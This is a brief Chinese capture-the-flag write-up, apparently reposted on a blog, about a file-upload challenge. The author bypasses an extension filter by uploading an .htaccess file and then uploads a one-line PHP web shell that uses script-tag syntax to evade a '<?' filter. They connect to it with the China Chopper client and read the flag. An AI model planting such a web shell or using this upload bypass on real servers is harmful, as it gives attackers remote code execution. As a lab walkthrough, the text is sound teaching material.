还是多积累吧,练得少没啥思路,借鉴其他大佬的wp
试了一下上传格式不支持.jpg和.gif,但是可以用png,根据提示不能上传带有ph的格式,试一下.hatcess,成功怼进去了
上传普通的一句话会被和谐掉,大佬说可能过滤了 <?
用js引用php可以绕过过滤
<script language='php'>assert($_REQUEST['cmd'])</script>
之后就可以用菜刀直接连接
但是终端用不了
在phpinfo中可以看到禁用了非常多的函数
不过可以直接在根目录下找到flag
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。